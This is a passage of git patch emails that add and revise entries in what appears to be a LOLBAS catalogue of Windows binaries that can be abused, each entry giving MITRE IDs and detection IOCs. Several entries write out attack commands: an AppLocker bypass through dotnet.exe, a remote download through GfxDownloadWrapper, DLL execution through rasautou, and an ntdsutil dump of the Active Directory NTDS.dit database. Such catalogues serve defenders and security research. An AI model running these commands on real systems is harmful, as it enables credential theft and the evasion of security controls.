From 5cb17cfb26e281eb40d51a8a2bcde4914cb4abc1 Mon Sep 17 00:00:00 2001 From: Ayush Sahay <47629256+felamos@users.noreply.github.com> Date: Wed, 11 Dec 2019 15:53:12 +0530 Subject: [PATCH 01/96] Create dotnet.yml --- yml/OtherMSBinaries/dotnet.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 yml/OtherMSBinaries/dotnet.yml diff --git a/yml/OtherMSBinaries/dotnet.yml b/yml/OtherMSBinaries/dotnet.yml new file mode 100644 index 0000000..b647d97 --- /dev/null +++ b/yml/OtherMSBinaries/dotnet.yml @@ -0,0 +1,31 @@ +--- +Name: dotnet.exe +Description: dotnet.exe comes with .NET Framework +Author: 'felamos' +Created: '2019-11-12' +Commands: + - Command: dotnet.exe [PATH_TO_DLL] + Description: dotnet.exe will execute any dll even if applocker is enabled. + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 7 and up with .NET installed + - Command: dotnet.exe [PATH_TO_DLL] + Description: dotnet.exe will execute any DLL. + Usecase: Execute DLL + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 7 and up with .NET installed +Full_Path: + - Path: 'C:\Program Files\dotnet\dotnet.exe' +Detection: + - IOC: dotnet.exe spawned an unknown process +Resources: + - Link: https://twitter.com/_felamos/status/1204705548668555264 +Acknowledgement: + - Person: felamos + Handle: '@_felamos' +--- From a057cf2420133683eb48af119c8ee100ef3cfa1c Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Fri, 27 Dec 2019 17:02:34 +0100 Subject: [PATCH 02/96] Create GfxDownloadWrapper.yml GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". --- yml/OSBinaries/GfxDownloadWrapper.yml | 176 ++++++++++++++++++++++++++ 1 file changed, 176 insertions(+) create mode 100644 yml/OSBinaries/GfxDownloadWrapper.yml diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml new file mode 100644 index 0000000..1ddb00e --- /dev/null +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -0,0 +1,176 @@ +Name: GfxDownloadWrapper.exe +Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. +Author: Jesus Galvez +Created: Jesus Galvez +Commands: + - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "" "" + Description: GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_5fc14233495bec91\GfxDownloadWrapper.exe "http://127.0.0.1:8005" "%temp%\test" + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows 10, Windows 7 +Full_Path: + - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ + - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ + - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ + - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ + - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ + - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ + - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ + - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ + - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ + - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ + - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ + - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ + - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ + - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ + - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ + - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ + - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ + - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ + - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ + - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ + - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ + - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ + - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ + - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ + - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ + - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ + - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ + - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ + - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ + - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ + - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ + - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ + - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ + - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ + - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ + - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ + - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ + - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ + - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ + - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ + - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ + - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ + - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ + - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ +Detection: + - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. +Resources: + - Link: https://www.sothis.tech/author/jgalvez/ +Acknowledgement: + - Person: Jesus Galvez From c9e608ce0f63cbcac9c2b5b264ea7218772aff44 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Fri, 27 Dec 2019 17:11:30 +0100 Subject: [PATCH 03/96] Update GfxDownloadWrapper.yml --- yml/OSBinaries/GfxDownloadWrapper.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 1ddb00e..98accb6 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -10,7 +10,7 @@ Commands: Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/techniques/T1105/ - OperatingSystem: Windows 10, Windows 7 + OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ From e1b36a25bd4fcd79154f65c2da57fba1a9f5eb1b Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:37:36 +0100 Subject: [PATCH 04/96] Rename dotnet.yml to Dotnet.yml --- yml/OtherMSBinaries/{dotnet.yml => Dotnet.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OtherMSBinaries/{dotnet.yml => Dotnet.yml} (100%) diff --git a/yml/OtherMSBinaries/dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml similarity index 100% rename from yml/OtherMSBinaries/dotnet.yml rename to yml/OtherMSBinaries/Dotnet.yml From 7030e009297f74c68f29e0a60a296580c696e51c Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:40:24 +0100 Subject: [PATCH 05/96] Capitalized dotnet name --- yml/OtherMSBinaries/Dotnet.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index b647d97..5475947 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -1,5 +1,5 @@ --- -Name: dotnet.exe +Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework Author: 'felamos' Created: '2019-11-12' From 22ef6bfc63a338184f4ad5d8c6fed3ea4c4d8064 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:45:25 +0100 Subject: [PATCH 06/96] Added additional paths to CL_MutexVerifiers.ps1 - input from @shilpeshTrivedi --- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 06bdf24..1916397 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -16,6 +16,8 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 Code_Sample: - Code: Detection: From 71aec7465be671e37dad5b8df0c5dd9bba57fc59 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 09:03:42 +0100 Subject: [PATCH 07/96] Minor adjustments to GfxDownloadWrapper.yml --- yml/OSBinaries/GfxDownloadWrapper.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 98accb6..a6ed7e4 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -1,3 +1,4 @@ +--- Name: GfxDownloadWrapper.exe Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Author: Jesus Galvez @@ -174,3 +175,5 @@ Resources: - Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - Person: Jesus Galvez + Handle: +--- From ecc94c2d09744f9372a656371cd902866422effc Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 09:08:13 +0100 Subject: [PATCH 08/96] Adjusted GfxDownloadWrapper --- yml/OSBinaries/GfxDownloadWrapper.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index a6ed7e4..8a251aa 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -4,9 +4,9 @@ Description: Remote file download used by the Intel Graphics Control Panel, rece Author: Jesus Galvez Created: Jesus Galvez Commands: - - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "" "" - Description: GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". - Usecase: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_5fc14233495bec91\GfxDownloadWrapper.exe "http://127.0.0.1:8005" "%temp%\test" + - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" + Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: Download file from internet Category: Download Privileges: User MitreID: T1105 From 99b87fdc13216e23d7839643fc6fa0f93bf68381 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 10 Jan 2020 22:52:15 -0600 Subject: [PATCH 09/96] Rasautou addition --- yml/OSBinaries/Rasautou.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OSBinaries/Rasautou.yml diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml new file mode 100644 index 0000000..e9276d5 --- /dev/null +++ b/yml/OSBinaries/Rasautou.yml @@ -0,0 +1,27 @@ +--- +Name: Rasautou.exe +Description: Windows Remote Access Dialer +Author: 'Tony Lambert' +Created: '2020-01-10' +Commands: + - Command: rasautou -d powershell.dll -p powershell -a a -e e + Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. + Usecase: Execute DLL code + Category: Execute + Privileges: User, Administrator in Windows 8 + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 +Full_Path: + - Path: C:\Windows\System32\rasautou.exe +Code_Sample: +- Code: +Detection: + - IOC: rasautou.exe command line containing -d and -p +Resources: + - Link: https://github.com/fireeye/DueDLLigence + - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html +Acknowledgement: + - Person: FireEye + Handle: '@FireEye' +--- \ No newline at end of file From e2f217c777817d01ab6636def476782b44e314bc Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 10 Jan 2020 22:53:34 -0600 Subject: [PATCH 10/96] ntdsutil addition --- yml/OtherMSBinaries/Ntdsutil.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/Ntdsutil.yml diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml new file mode 100644 index 0000000..52d11df --- /dev/null +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -0,0 +1,26 @@ +--- +Name: ntdsutil.exe +Description: Command line utility used to export Actove Directory. +Author: 'Tony Lambert' +Created: '2020-01-10' +Commands: + - Command: ntdsutil.exe “ac i ntds” “ifm” “create full c:\” q q + Description: Dump NTDS.dit into folder + Usecase: Dumping of Active Directory NTDS.dit database + Category: Dump + Privileges: Administrator + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows +Full_Path: + - Path: C:\Windows\System32\ntdsutil.exe +Code_Sample: + - Code: +Detection: + - IOC: ntdsutil.exe with command line including "ifm" +Resources: + - Link: https://adsecurity.org/?p=2398#CreateIFM +Acknowledgement: + - Person: Sean Metcalf + Handle: '@PyroTek3' +--- From 94708ac5d6dc7457d807e41bd146f5ed7dafb813 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 23 Jan 2020 08:57:43 +0100 Subject: [PATCH 11/96] Added links to obfuscation technique from Sailay(valen) on rundll32 --- yml/OSBinaries/Rundll32.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d452cb6..2d1ad59 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -73,6 +73,8 @@ Resources: - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ + - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md + - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md Acknowledgement: - Person: Casey Smith Handle: '@subtee' @@ -80,4 +82,6 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Jimmy Handle: '@bohops' + - Person: Sailay + Handle: '@404death' --- From acecdcf3dffcf3787bc8dd917c1f8d1dc55166b7 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 23 Jan 2020 09:07:40 +0100 Subject: [PATCH 12/96] Netsh contribution from Freddie Bar-Smith - Thank you --- yml/OSBinaries/Netsh.yml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 yml/OSBinaries/Netsh.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml new file mode 100644 index 0000000..63b0d40 --- /dev/null +++ b/yml/OSBinaries/Netsh.yml @@ -0,0 +1,35 @@ +--- +Name: Netsh.exe +Description: Netsh is a Windows tool used to manipulate network interface settings. +Author: 'Freddie Barr-Smith' +Created: '2019-12-24' +Commands: 